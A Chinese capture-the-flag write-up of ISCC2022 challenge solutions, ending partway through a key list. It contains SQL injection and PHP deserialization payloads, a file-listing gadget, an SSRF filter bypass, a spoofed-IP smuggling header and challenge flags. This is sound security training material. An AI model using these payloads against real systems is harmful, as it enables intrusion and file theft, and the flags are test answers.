ISCC2022 | 风尘孤狼

ISCC2022

ISCC2022练武题和擂台赛的部分WP

练武题wp

WEB

冬奥会

payload

?Information={"year":"a","items":[0,[],3]}

Easy-SQL

id=0 union TABLE emails limit 7,1

得到源码之后审计:sqlWaf 只对 passwd 做了过滤,username 未经任何过滤就被拼进 SQL 语句,且登录逻辑最终只校验查询返回行中的 username 和 passwd。

<?php
include "./config.php";
// error_reporting(0);
// highlight_file(__FILE__);
// Open the database connection. $hostname/$username/$password/$database are not defined
// in this listing; presumably they come from the config.php included above - confirm.
// NOTE(review): $username is reused further down for the POSTed login name, so the
// database account name is overwritten once a login request is processed.
$conn = mysqli_connect($hostname, $username, $password, $database);
  if ($conn->connect_errno) {
  // The numeric connection error code is sent to the client here; logging it
  // server-side and returning a generic message would avoid the disclosure.
  die("Connection failed: " . $conn->connect_errno);
} 

// Static hints printed on every request, before any parameter is handled.
echo "Where is the database?"."<br>";

echo "try ?id";

/**
 * Denylist check for one string.
 *
 * Returns False when $s matches any alternative in $filter (case-insensitive)
 * and True otherwise. In this file it is called only on $_POST['passwd'];
 * $_POST['username'] and $_GET['id'] never pass through it.
 *
 * NOTE(review): a keyword/character denylist does not replace bound parameters.
 * It has to anticipate every dangerous spelling, while a prepared statement
 * removes the need to inspect the value at all.
 */
function sqlWaf($s)
{
  // Alternatives include SQL keywords (select, from, where, ...), the operators = > <,
  // the statement terminator ;, both quote characters, ^, | and the space character.
  // NOTE(review): 'grand' looks like a typo for 'grant' - confirm against the challenge source.
  $filter = '/xml|extractvalue|regexp|copy|read|file|select|between|from|where|create|grand|dir|insert|link|substr|mid|server|drop|=|>|<|;|"|\^|\||\ |\'/i';
  // preg_match() returns false on a PCRE error, which is falsy, so an error
  // falls through to "return True": the check fails open.
  if (preg_match($filter,$s))
      return False;
  return True;
}

// Lookup branch: runs when the request carries ?id=...
if (isset($_GET['id'])) 
{
  $id = $_GET['id'];
  // String-built SQL: $id is interpolated as an unquoted value with no cast and no
  // escaping, so the request controls the query text (SQL injection).
  // A prepared statement with a bound integer parameter would close this.
  $sql = "select * from users where id=$id";
  // The only guard is a case-insensitive search for the word "select". Blocking one
  // keyword does not constrain what the rest of the value does to the query.
  $safe = preg_match('/select/is', $id);
  // preg_match() gives 1 on a match, 0 on no match and false on error, so this
  // aborts on a match and also on a regex error (fails closed, unlike sqlWaf).
  if($safe!==0)
      die("No select!");
  $result = mysqli_query($conn, $sql);
  if ($result) 
  {
      // mysqli_fetch_array() returns null when the result set is empty; the two
      // index accesses below are not guarded against that.
      $row = mysqli_fetch_array($result);
      // Database values are written into HTML without htmlspecialchars(), and the
      // passwd column is returned to the client as-is.
      echo "<h3>" . $row['username'] . "</h3><br>";
      echo "<h3>" . $row['passwd'] . "</h3>";
  }
  else
      die('<br>Error!');
}


// Login branch: runs when both username and passwd are POSTed.
if (isset($_POST['username']) && isset($_POST['passwd'])) 
{

  // strval() only forces a string type; it performs no filtering or escaping.
  $username = strval($_POST['username']);
  $passwd = strval($_POST['passwd']);

  // Only $passwd goes through the denylist; $username reaches the query unchecked.
  if ( !sqlWaf($passwd) )
      die('damn hacker');

  // Both values are interpolated inside single-quoted SQL literals. A quote character
  // in $username ends the literal, so the request controls the query text.
  // Bound parameters ($conn->prepare(...) with bind_param) are the fix.
  // The "${var}" interpolation form is also deprecated as of PHP 8.2.
  $sql = "SELECT * FROM users WHERE username='${username}' AND passwd= '${passwd}'";
  // query() can return false on failure; the next line dereferences it unchecked.
  $result = $conn->query($sql);
  if ($result->num_rows > 0) {
      $row = $result->fetch_assoc();
      // The checks below trust whatever row the query returned. Because the query text
      // is request-controlled, the row's contents are not guaranteed to come from the
      // users table.
      if ( $row['username'] === 'admin' && $row['passwd'] )
      {
          // Loose (==) comparison of the row's passwd against the submitted value.
          // This implies passwords are stored in plaintext; password_hash() /
          // password_verify() would avoid both the storage and the comparison issue.
          if ($row['passwd'] == $passwd)
          {
              // $flag is not defined in this listing; presumably set in config.php - confirm.
              die($flag);
          } else {
              die("username or passwd wrong, are you admin?");
          }
      } else {
          die("wrong user");
      }
  } else {
      die("user not exist or wrong passwd");
  }
}
// Reached only when none of the die() calls above ended the request.
mysqli_close($conn); 
?>

payload

username=1'/**/union/**select/**/1,0x61646d696e,3%23&passwd=3

Pop2022

预期解

exp

<?php
// Local stand-in declaring only the properties that get serialized. The target
// application's own Road_is_Long class (with its methods) is not shown on this page.
// Property names, order and visibility determine the serialized bytes.
class Road_is_Long{
    public $page;
    public $string;
}

// Stand-in carrying a single protected property. Protected properties serialize with
// a "\0*\0" name prefix, which appears as %00*%00var in the encoded output below.
// NOTE(review): the serialized string printed after this listing carries
// resource=../../../flag (s:62), not resource=index.php, so that output was produced
// with a different $var value than the one shown here.
class Try_Work_Hard{
    protected  $var="php://filter/read=convert.base64-encode/resource=index.php";
}

// Stand-in with one public property; the target's real class body is not shown on this page.
class Make_a_Change{
    public $effort;
}
// Build the nested object graph and print its URL-encoded serialization:
//   $road1->page -> $road2, $road2->string -> $make, $make->effort -> $try
// NOTE(review): this only has an effect because the target evidently hands a request
// parameter to unserialize() (target code not shown on this page - confirm).
// The durable fix is on that side: do not unserialize() request data; use json_decode(),
// or pass ['allowed_classes' => false] where unserialize() cannot be avoided.
$road1=new Road_is_Long();
$road2=new Road_is_Long();
$try=new Try_Work_Hard();
$make=new Make_a_Change();



$make->effort=$try;
$road2->string=$make;
$road1->page=$road2;
$ser=serialize($road1);
// urlencode() keeps the NUL bytes of the protected-property prefix intact in a query string.
echo urlencode($ser);
?wish=O%3A12%3A"Road_is_Long"%3A2%3A{s%3A4%3A"page"%3BO%3A12%3A"Road_is_Long"%3A2%3A{s%3A4%3A"page"%3BN%3Bs%3A6%3A"string"%3BO%3A13%3A"Make_a_Change"%3A1%3A{s%3A6%3A"effort"%3BO%3A13%3A"Try_Work_Hard"%3A1%3A{s%3A6%3A"%00*%00var"%3Bs%3A62%3A"php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3D..%2F..%2F..%2Fflag"%3B}}}s%3A6%3A"string"%3BN%3B}

非预期解

/flag.php

让我康康!

http请求走私

走私成功,但是显示本地才可以看到,那么添加一下secr3t_ip: 127.0.0.1

ISCC{AWEIweiwwwweeeiii_JJj9JJGg5GGG_NONONONO2022}

这是一道代码审计题

先访问/index,抓包删除login=0,然后修改url/index?url=127.0.0.1,然后得到./static/code.txt,访问得到

👛👜👝🐗👞👜👥👜👊👠👞👥🐟🐠🐱🐁🐗🐗🐗🐗👠👝🐟👚👦👥👫👩👦👣👖👢👜👰🐴🐴🐨🐠🐱🐁🐗🐗🐗🐗🐗🐗🐗🐗👩👜👫👬👩👥🐗👩👜👥👛👜👩👖👫👜👤👧👣👘👫👜🐟🐙👠👥👛👜👯🐥👟👫👤👣🐙🐠🐁🐗🐗🐗🐗👜👣👪👜🐱🐁🐗🐗🐗🐗🐗🐗🐗🐗👩👜👫👬👩👥🐗🐙👐👦👬🐗👟👘👭👜🐗👥👦👫🐗👘👚👚👜👪👪🐗👫👦🐗👫👟👠👪🐗👧👘👞👜🐘🐙🐁🐁👛👜👝🐗👚👟👜👚👢👖👪👪👩👝🐟👬👩👣🐠🐱🐁🐗🐗🐗🐗👟👦👪👫👥👘👤👜🐗🐴🐗👬👩👣👧👘👩👪👜🐟👬👩👣🐠🐥👟👦👪👫👥👘👤👜🐁🐗🐗🐗🐗👫👩👰🐱🐁🐗🐗🐗🐗🐗🐗🐗🐗👠👝🐗👥👦👫🐗👩👜🐥👤👘👫👚👟🐟🐞👟👫👫👧👪🐶🐱🐦🐦🐟🐶🐱👒🐤👓👮🐥👔👳🐟🐶🐱🐜👒👓👛👘🐤👝🐸🐤🐽👔👲🐩👴🐠🐠🐢🐞🐣🐗👬👩👣🐠🐱🐁🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗👠👝🐗👥👦👫🐗👩👜🐥👤👘👫👚👟🐟🐞👟👫👫👧👪🐶🐱🐦🐦🐷🐟🐶🐱👒🐤👓👮🐥👔👳🐟🐶🐱🐜👒👓👛👘🐤👝🐸🐤🐽👔👲🐩👴🐠🐠🐢🐞🐣🐗👬👩👣🐠🐱🐁🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗👩👘👠👪👜🐗🐹👘👪👜🐼👯👚👜👧👫👠👦👥🐟🐙👬👩👣🐗👝👦👩👤👘👫🐗👜👩👩👦👩🐙🐠🐁🐗🐗🐗🐗🐗🐗🐗🐗👠👝🐗🐗👩👜🐥👤👘👫👚👟🐟🐞👟👫👫👧👪🐶🐱🐦🐦🐷🐟🐶🐱👒🐤👓👮🐥👔👳🐟🐶🐱🐜👒👓👛👘🐤👝🐸🐤🐽👔👲🐩👴🐠🐠🐢🐞🐣🐗👬👩👣🐠🐱🐁🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗👠👝🐗👡👬👛👞👜👖👠👧🐟👟👦👪👫👥👘👤👜🐠🐱🐁🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗👩👜👫👬👩👥🐗👋👩👬👜🐁🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗👩👜👫👬👩👥🐗🐽👘👣👪👜🐣🐗🐙👐👦👬🐗👥👦👫🐗👞👜👫🐗👫👟👜🐗👩👠👞👟👫🐗👚👣👬👜🐘🐙🐁🐗🐗🐗🐗🐗🐗🐗🐗👜👣👪👜🐱🐁🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗👠👧👖👘👛👛👩👜👪👪🐗🐴🐗👪👦👚👢👜👫🐥👞👜👫👘👛👛👩👠👥👝👦🐟👟👦👪👫👥👘👤👜🐣🐞👟👫👫👧🐞🐠👒🐧👔👒🐫👔👒🐧👔🐁🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗👠👝🐗👠👪👖👠👥👥👜👩👖👠👧👘👛👛👩👜👪👪🐟👠👧👖👘👛👛👩👜👪👪🐠🐱🐁🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗👩👜👫👬👩👥🐗🐽👘👣👪👜🐣🐙👠👥👥👜👩🐗👠👧🐗👘👛👛👩👜👪👪🐗👘👫👫👘👚👢🐙🐁🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗👜👣👪👜🐱🐁🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗👩👜👫👬👩👥🐗🐽👘👣👪👜🐣🐗🐙👐👦👬🐗👥👦👫🐗👞👜👫🐗👫👟👜🐗👩👠👞👟👫🐗👚👣👬👜🐘🐙🐁🐗🐗🐗🐗👜👯👚👜👧👫🐗🐹👘👪👜🐼👯👚👜👧👫👠👦👥🐗👘👪🐗👜🐱🐁🐗🐗🐗🐗🐗🐗🐗🐗👩👜👫👬👩👥🐗🐽👘👣👪👜🐣🐗👪👫👩🐟👜🐠🐁🐗🐗🐗🐗👜👯👚👜👧👫🐱🐁🐗🐗🐗🐗🐗🐗🐗🐗👩👜👫👬👩👥🐗🐽👘👣👪👜🐣🐗🐙👬👥👢👥👦👮🐗👜👩👩👦👩🐙🐁🐁👛👜👝🐗👠👧🐩👣👦👥👞🐟👠👧👖👘👛👛👩🐠🐱🐁🐗🐗🐗🐗👩👜👫👬👩👥🐗👪👫👩👬👚👫🐥👬👥👧👘👚👢🐟🐙🐘👃🐙🐣🐗👪👦👚👢👜👫🐥👠👥👜👫👖👘👫👦👥🐟👠👧👖👘👛👛👩🐠🐠👒🐧👔🐁🐁👛👜👝🐗👠👪👖👠👥👥👜👩👖👠👧👘👛👛👩👜👪👪🐟👠👧🐠🐱🐁🐗🐗🐗🐗👠👧🐗🐴🐗👠👧🐩👣👦👥👞🐟👠👧🐠🐁🐗🐗🐗🐗👧👩👠👥👫🐟👠👧🐠🐁🐗🐗🐗🐗👩👜👫👬👩👥🐗👠👧🐩👣👦👥👞🐟🐞🐨🐩🐮🐥🐧🐥🐧🐥🐧🐞🐠🐗🐵🐵🐗🐩🐫🐗🐴🐴🐗👠👧🐗🐵🐵🐗🐩🐫🐗👦👩🐗👠👧🐩👣👦👥👞🐟🐞🐨🐧🐥🐧🐥🐧🐥🐧🐞🐠🐗🐵🐵🐗🐩🐫🐗🐴🐴🐗👠👧🐗🐵🐵🐗🐩🐫🐗👦👩🐗👠👧🐩👣👦👥👞🐟🐞🐨🐮🐩🐥🐨🐭🐥🐧🐥🐧🐞🐠🐗🐵🐵🐗🐩🐧🐗🐴🐴🐗👠👧🐗🐵🐵🐗🐩🐧🐗👦👩🐗👠👧🐩👣👦👥👞🐟🐞🐨🐰🐩🐥🐨🐭🐯🐥🐧🐥🐧🐞🐠🐗🐵🐵🐗🐨🐭🐗🐴🐴🐗👠👧🐗🐵🐵🐗🐨🐭🐗👦👩🐗👠👧🐩👣👦👥👞🐟🐞🐧🐥🐧🐥🐧🐥🐧🐞🐠🐗🐵🐵🐗🐩🐫🐗🐴🐴🐗👠👧🐗🐵🐵🐗🐩🐫🐁🐁👛👜👝🐗👮👘👝🐨🐟👠👧🐠🐱🐁🐗🐗🐗🐗👝👦👩👙👠👛👛👜👥👖👣👠👪👫🐗🐴🐗👒🐗🐞🐥🐞🐣🐗🐞🐧🐞🐣🐗🐞🐨🐞🐣🐗🐞🐩🐞🐣🐗🐞🐮🐞👔🐁🐗🐗🐗🐗👝👦👩🐗👮👦👩👛🐗👠👥🐗👝👦👩👙👠👛👛👜👥👖👣👠👪👫🐱🐁🐗🐗🐗🐗🐗🐗🐗🐗👠👝🐗👠👧🐗👘👥👛🐗👮👦👩👛🐱🐁🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗👠👝🐗👮👦👩👛🐗👠👥🐗👠👧🐥👣👦👮👜👩🐟🐠🐱🐁🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗👩👜👫👬👩👥🐗👋👩👬👜🐁🐗🐗🐗🐗👩👜👫👬👩👥🐗🐽👘👣👪👜🐁🐁👛👜👝🐗👡👬👛👞👜👖👠👧🐟👠👧🐠🐱🐁🐗🐗🐗🐗👠👝🐟👮👘👝🐨🐟👠👧🐠🐠🐱🐁🐗🐗🐗🐗🐗🐗🐗🐗👩👜👫👬👩👥🐗🐽👘👪👣👜🐁🐗🐗🐗🐗👜👣👪👜🐱🐁🐗🐗🐗🐗🐗🐗🐗🐗👘👛👛👩🐗🐴🐗👘👛👛👩🐥👜👥👚👦👛👜🐟👜👥👚👦👛👠👥👞🐗🐴🐗🐙👬👫👝🐤🐯🐙🐠🐁🐗🐗🐗🐗🐗🐗🐗🐗👠👧👧🐗🐴🐗👙👘👪👜🐭🐫🐥👜👥👚👦👛👜👪👫👩👠👥👞🐟👘👛👛👩🐠🐁🐗🐗🐗🐗🐗🐗🐗🐗👠👧👧🐗🐴🐗👠👧👧🐥👪👫👩👠👧🐟🐠🐥👣👦👮👜👩🐟🐠🐥👛👜👚👦👛👜🐟🐠🐁🐗🐗🐗🐗🐗🐗🐗🐗👠👝🐟👠👧🐴🐴👠👧👧🐠🐱🐁🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗👞👣👦👙👘👣🐗👚👦👥👫👩👦👣👖👢👜👰🐁🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗👚👦👥👫👩👦👣👖👢👜👰🐗🐴🐗🐨🐁🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗👩👜👫👬👩👥🐗👋👩👬👜🐁🐗🐗🐗🐗🐗🐗🐗🐗👜👣👪👜🐱🐁🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗👩👜👫👬👩👥🐗🐽👘👣👪👜

base100解码得到源码

def geneSign():
    """Return the rendered index page when the module-level control_key equals 1, else a refusal string.

    In this listing control_key is set to 1 only inside judge_ip(), and nothing resets it.
    NOTE(review): the gate is process-wide state rather than per-session state, so once
    any request sets the flag, every later request handled by the same process passes.
    """
    if(control_key==1):
        return render_template("index.html")
    else:
        return "You have not access to this page!"

def check_ssrf(url):
    """Validate a user-supplied URL; returns True, or a (False, message) tuple on every other path.

    NOTE(review): the failure value is a non-empty tuple, which is truthy. A caller
    testing the result with a bare `if` would treat failures as success (caller not
    shown in this listing - confirm how the result is consumed).
    """
    # urlparse() lower-cases the hostname it returns.
    hostname = urlparse(url).hostname
    try:
        # Accept only "http(s)://host..." or "http(s)://@host..." prefixes.
        # The patterns are non-raw strings containing \w and \d, which newer Python
        # versions warn about; raw strings (r'...') avoid that.
        if not re.match('https?://(?:[-\w.]|(?:%[\da-fA-F]{2}))+', url):
            if not re.match('https?://@(?:[-\w.]|(?:%[\da-fA-F]{2}))+', url):
                raise BaseException("url format error")
        # "http(s)://@host" form: the hostname goes to judge_ip(). This is the only
        # path in the function that can return True.
        if  re.match('https?://@(?:[-\w.]|(?:%[\da-fA-F]{2}))+', url):
            if judge_ip(hostname):
                return True
            return False, "You not get the right clue!"
        else:
            # Plain form: resolve the host and test it against the private ranges.
            # Both outcomes below return a failure tuple; only the message differs.
            ip_address = socket.getaddrinfo(hostname,'http')[0][4][0]
            if is_inner_ipaddress(ip_address):
                return False,"inner ip address attack"
            else:
                return False, "You not get the right clue!"
    # Catching BaseException also swallows KeyboardInterrupt and SystemExit, and the
    # exception text is returned to the caller.
    except BaseException as e:
        return False, str(e)
    # Unreachable: the handler above already catches everything.
    except:
        return False, "unknow error"

def ip2long(ip_addr):
    """Convert an IPv4 address string to its 32-bit unsigned integer value (network byte order).

    socket.inet_aton() handles IPv4 only and raises OSError for input it cannot parse,
    which includes IPv6 literals.
    """
    return struct.unpack("!L", socket.inet_aton(ip_addr))[0]

def is_inner_ipaddress(ip):
    """Return True when the IPv4 address falls in 127/8, 10/8, 172.16/12, 192.168/16 or 0/8.

    NOTE(review): ranges this check does not cover include 169.254.0.0/16 (link-local)
    and every IPv6 address; the standard-library ipaddress module (is_private,
    is_loopback, is_link_local) gives a more complete test.
    """
    ip = ip2long(ip)
    # Debug output left in: prints the integer form of every checked address.
    print(ip)
    # Each comparison shifts away the host bits and compares the remaining network prefix.
    return ip2long('127.0.0.0') >> 24 == ip >> 24 or ip2long('10.0.0.0') >> 24 == ip >> 24 or ip2long('172.16.0.0') >> 20 == ip >> 20 or ip2long('192.168.0.0') >> 16 == ip >> 16 or ip2long('0.0.0.0') >> 24 == ip >> 24

def waf1(ip):
    """Return True when `ip` contains any of the characters '.', '0', '1', '2' or '7'; otherwise False.

    A character denylist: it rejects dotted-decimal spellings that use those characters
    but says nothing about what the remaining characters encode.
    """
    forbidden_list = [ '.', '0', '1', '2', '7']
    for word in forbidden_list:
        # `word` is always a non-empty string, so this only guards against an empty or None `ip`.
        if ip and word:
            if word in ip.lower():
                return True
    return False

def judge_ip(ip):
    """Compare `ip` with the lower-cased base64 encoding of `addr`; on a match set the global control_key to 1.

    NOTE(review): as transcribed, this function cannot run to completion - see the
    inline notes on `Fasle` and `addr`.
    """
    if(waf1(ip)):
        # `Fasle` is not defined anywhere in this listing, so reaching this line raises
        # NameError (likely a typo for False).
        return Fasle
    else:
        # `addr` is read before it is assigned anywhere in this function, which raises
        # UnboundLocalError as written. The listing is presumably missing the line that
        # defines it - confirm against the decoded source.
        addr = addr.encode(encoding = "utf-8")
        # base64.encodestring() was removed in Python 3.9; base64.encodebytes() replaces it.
        ipp = base64.encodestring(addr)
        # Lower-casing is lossy because base64 is case-sensitive. It matches the
        # lower-cased hostname that urlparse() produces in check_ssrf().
        ipp = ipp.strip().lower().decode()
        if(ip==ipp):
            # Flips the process-wide flag that geneSign() checks; nothing in this listing resets it.
            global control_key
            control_key = 1
            return True
        else:
            return False

代码审计之后访问?url=http://@MTI3LjAuMC4x(MTI3LjAuMC4x 是 127.0.0.1 的 base64 编码,judge_ip 比较的正是主机名与该编码的小写形式),得到一个路径和一个cookie,用cookie访问这个路径,查看html

尝试xxe,得到flag

爱国敬业好青年-2

get/change然后post天安门坐标lati=116°23′E&langti=39°54′N

flag=ISCC{w19qs_10llQBX08vE_a0_1qNO}

findme

查看源码有提示,访问/unser.php

post传参

data=O:1:"a":1:{s:3:"un2";s:49:"php://filter/read=convert.base64-encode/resource=";}
PD9waHANCiRhID0gJ2ZsYWflnKjlvZPliY3nm67lvZXkuIvku6XlrZfmr41m5byA5aS055qEdHh05LitLOaXoOazleeIhuegtOWHuuadpSc7

base64解码得到

<?php
$a = 'flag在当前目录下以字母f开头的txt中,无法爆破出来';

原生类扫目录

data=O:1:"a":5:{s:3:"un0";s:18:"FilesystemIterator";s:3:"un1";s:9:"glob://f*";s:3:"un2";N;s:3:"un3";s:11:"unserialize";s:3:"un4";N;}

img

扫到 `Your output: fA07TE_G19nde_OR1Der5r.txt`,访问得到flag

img

MISC

单板小将苏翊鸣

图片截断了,恢复一下,用010编辑器打开,调整长宽一样,即可恢复图片

image-20220501103202079

得到二维码,扫码得到unicode编码

\u5728\u8fd9\u6b21\u51ac\u5965\u4f1a\u7684\u821e\u53f0\u4e0a\uff0c\u6211\u56fd\u5c0f\u5c06\u82cf\u7fca\u9e23\u65a9\u83b7\u4e00\u91d1\u4e00\u94f6\uff0c\u90a3\u4f60\u77e5\u9053\u6b64\u6b21\u51ac\u5965\u4f1a\u6211\u56fd\u603b\u5171\u83b7\u5f97\u51e0\u679a\u5956\u724c\u5417\uff1f\u53c8\u5206\u522b\u662f\u51e0\u91d1\u51e0\u94f6\u51e0\u94dc\u5462\uff1f

解码得到image-20220501103257825

查询数据得到解压密码

image-20220501103317816

image-20220501103327929

藏在星空中的诗-1

下载附件stars.psd用ps打开,调整图层一不透明度为100%,看到提示

然后打开那个Poem.txt附件,进行排序,得到的就是解压密码,解压那个压缩包之后是表格,对照表格就可以翻译出flag!img

img

img

藏在星空中的诗-2

利用在线工具将杂项符号转为unicode字符,一一对照好表即可得到

\u0049\u0053\u0043\u0043\u007B\u0062\u0032\u0039\u0021\u0061\u0031\u0028\u0035\u0028\u004A\u0058\u0045\u0070\u0035\u007D

解码后得到

ISCC{b29!a1(5(JXEp5}

降维打击

得到的图片binwalk扫一下看看,发现可以分离一个

binwalk 1.png
dd if=1.png of=3.jpg skip=290500 bs=1

imgimg

再用zsteg分离得到最后的图片,

zsteg -a 1.png

img

zsteg -e b1,r,lsb,yx 1.png -> 3.png 
得到下面这个

img

对照这个得到flag

ISCC{BRDB-CLHD-JLRN}

真相只有一个

附件stream开头加50 4B,压缩加密包,然后entity.png的lsb中发现一部分密码

img

根据密码制作爆破字典,爆破得到19981111,解压出文件stream.pcapng,流量分析,导出来了一个MP3文件,看一下发现摩斯密码img

../.../-.-./-.-./--/../.../-.-./解码是I S C C M I S C

用snow.exe解密,得到flag

img

ISCC{NSm4-FYDg-F8GI}

2022冬奥会

图片隐写,调整长宽一样,得到html实体编码

img

img

所以解压密码为灯笼,得到文件flag.jpg,文本查看得到flag

ISCC{beij-dahb-1009}

套中套

图片加png文件头,改高得第一部分密码

img

img

第一段密码wELC0m3_

第二部分,lsb十六进制得到T0_tH3

第三部分图片尾部base64解码得到_ISCC_Zo2z

拼接解压密码为wELC0m3_T0_tH3_ISCC_Zo2z

解压后写个脚本

pubKey = ([24711277289455805071082183921144414032582753663573146469690760085918988346282287830925440309641574970837122386670243171683088155559238888879589465620187779156722578866277244839846688585479196, 8331342674634579788187066694536982163316001309813524371617575401438981756213646261714664444979049172993827679059994325931829820406248619183121063046359168137539946177441258548198381042506623, 37703954458339783215182402838858898442104300800502847019310017886763632326958244079374887169631622937188935937560635479222556228345922043876878912006330280400021181064023528428229021383998773, 25945844358709395918619063088903632951477946913663605727390703353781460648598193122979795324054791877587120519204436132166734684859520681257026335668408205578299876294763586571517340099833251, 46617796408457800169802970506008979749949755415344267530184000035045033930599177801417568531348337113951787988075042216831770929779149620046070943604233228701354336451430773154133861987749736, 42327880776629974121037465864835269480416131528553513676712544339274319407214439082635821738006051597102762475984356192961043234567645210948258511362083821220049393631612535119736190230505079, 22589508873462778330480725281334942556920040122718087013134335609054373022750940493907481894041761451500933602254201267626587716133274536950322527863347103390866567700839589023665853744176166, 49012245620167849002831231356902229194157957266486347984277724206214957520359694455291662818602399440527235773250855790121299923414792428085214736131229263074041971520146812818292757283873972, 50505294007387374356187011832999770420942567192611311152519245434155214975329620482872555711095896003177127425845837803400857344978100153324725001556125905437698323475597576788218126161099748, 34414786369900765425214990265206529100837523490988350328499535711172031795804372249788550156161478651816329269889968144030583108248751740619681030774787866493158241605226717696519397656928761, 
5502680605412473949454545822542086565207206020304695803386351464931798180745299614793446981159878475871947667524780863633062822368011961917121718991914199133807397897209943082470470090855239, 9983311781614144459946114456331704088107639087097626233450958945692605583507051189547829807304454244438044518594916557943389434148863316112458522629232887473171898243371185747762751823927947, 48595344374998502475371076864600970857905298177970136849177794628315586457194537343102046554336867973271712237460686037428475343416532023474688245581528647040159995621526996436779938514083176, 30454044156600685547012361559528681837862663453766414789613678283059618403587081733150542831360841363729852732400590613716299519010668812729035958444961137248573111009009383052804127453631029, 29262465032576518257676026674076229615092607424499500332652757724283094828286106061934536663326477468236600903584605319876120398091060431915056800709813964618546529513946627290425530263151785, 58185916880654264057610847400993593764760105195559718130914887205667627960557861087272445125027305651241372181116022684217422418467491370778628349874535569764190295247016711254931516685468763, 50921877714800544475632450382663873906375610195117639257647328721148735828096477553253402935403941670891094883705610281862715168903139696245286876582609952598151293850053015830379511213972743, 38666998055817743159315776056038793353694644727484775020315432289017565065508607748180887543997777917674564556433615026286429388346922382550025360849523093169561551332244159493719912059781747, 2618433286435944949991686140343101299794881415225422420328973994756674163460246534976704295474642810788091225332813529196514409401028062132727458892297854618591225064139465121144529214787359, 15480360531471643031574551152063675696371174191802025724204527356937457630739509894172219260947369397642717350574189853163983085630193129264991869792533078518435439873596650874449441676462668, 
58602755253467326614029454783001663335922655777271770463533491628284000847218760267942717989253811387794064666939321561082896879847104642223475122351990487064856802357742730475539596891046692, 45168901123765244366991602858072030788922012241759967936935800489295253946084124106950261327937372194753304110979424196891136037000437320540563517970728380740700665590309964696933950533768952, 53095220066787807649094688415293583022426300394279421659984006465439017324791757144036815940148125279160663621726851858919264911024418507573076327932777107133556897824458372268197339351996050, 7678913185720959224047113283074762966863107257800639648979005678996248105320726214014045806477516899572209637951171447194990910321009220926072297492552801113592628268168399993433574593468502, 37959167582142866022915755986516747311215397821143293846538370998334979797451952481900560704924212988331999767036435777857836921012939210300341751727693548094496560256667712513408836716151074, 42545651517052026953249976733757718747130734598590641325774938685131495452170811885054225996530481032917830345573501191848318085310680273722163386097519639838241428199477437118408178621714090, 9610398279793845223820268953510232729434113393447557999421324995891410814235346759722388316420086296823885985383986638804541574127436150632247129329642747382993402273123828606362086318506545, 19744463887853987506188522688256493351113392479139564742274843195446027734615303020507489136276819812156933775184303608853288797112385962842355566409118478523637667689401510327050155689808963, 4979725803451704682802880425760671801962766594838959346702420024010102650906378175453619080006362724140800969629231682256658227953985378988108718052114334610337888358558164563679074179033934, 14668926421930473155760358387668904656497776501581195022959128573164793788948794457559050645601182951043234342754812273237061242925319104145642020731124457228317607584856514851170615444585585, 
65460455002095463508301635207629900022172062603490940057644254400602061418400712297851174032682485882152324214175826165198187099415985297071102776139652984105656201824622553650351799670588945, 2661582533837323983338590062273864301520364357326397920797454944448601911987473465460828367531110033944206117854888428975522476433664338677957019186057110810519534270822863250691457027593044, 12779538505968702708943253328588728814163836032044638747479959239567449619129948012323703553074068191861884355252056415586155135230805815334700683270866487727255569344526622102605049252079197, 61850420362081340308749776345287798149061549939713451598686569595944195998479323930424617090021990637343593584275285296073664530610784418964777622558593896220355098893449991046432197436590815, 55625447034346997655074779792845329848809970234865960498575324169373167970644250275659589291416779330651965190925772334134206502201511955295465581204246482599158834755828739181504688410920090, 14904416005293582561987587212996876960447129876275219980351894584893221270898227205432948845449024712153119872936901283208094580739338490281888647967290861290740157152083915985337434978775904, 22124674754977812834516102854378858529050297803781298797684567461794296685433530240042006429346019294626453914904754425265053037676951997297488874191557784738147055187532517864892027545298315, 18846351874932455622296051092933876028586499884893900742644639816966464207437422678519642330669038978839515093500362729871914197160713556726040506000368526650143519884877363746788961859989132, 22621081149159015032567107719504347553695386923914299415914444288427632487375293596913741307338667796227951565057968083909077066212716991784793985426486838103686411659077034844503176126567789, 12841230998641798116266593207198166735649244492468830162894469944312052458513299045512671494847852308192790180827409763300150170518414022443797443862609024112812965192094711713497604266811617, 
10120786799092778094362830067718923842287649317231090770753807189327548106271431002352232816195303298621999022897198457071919114192622014766892543765787280919930815665277147113583396384891114, 41058266319171356374485005618004422265584323710442517247462290624711242578501950124337337997903722834505655714173946372357388396919574021230083882069680153932985831403137524643030385483815800, 52123283472128316976708419634197224071433654547106397460579199293819026350322017651507957133210688435669095244293484184128258366381757433420307988730493665490856056537033979057193480998097763, 61517000967319117566171338221047330324581806374237642231312875833519844079258930787946797082344032110584013134544810839209391074579550421215971726155645956597376068740958698177283737732404827, 16226604739632728375919222595116206334428679353666170449035928991694074630451995163679983802354971368824866433579166025208076428816325748310550403150758192348214760885159116096572525662760101, 66426425703890778075927785969483365267871617675478998065442032710527705903907361434181820023570278730664036493302248694491694073172393569278385741463905464555180447947933938943615052818914183, 2947564769556925319605959230538793663161870226300339519130608498491408776005940198508419841645157582994321121394440225564853852393337606976093752663624776361514402935785722131835098911019403, 29816961646282465976871364104247457927102559081322327721155071385836502816923727268294499430672418815779732053170563814985562872882795933257469163203884659053514988942243178662463188473560295, 2713256216439803749984745895883483863952318758610018250131057573305530374971962615309909225198562619133130194827974264753823687992661761964310791098240593066207346880490695957421285463229107, 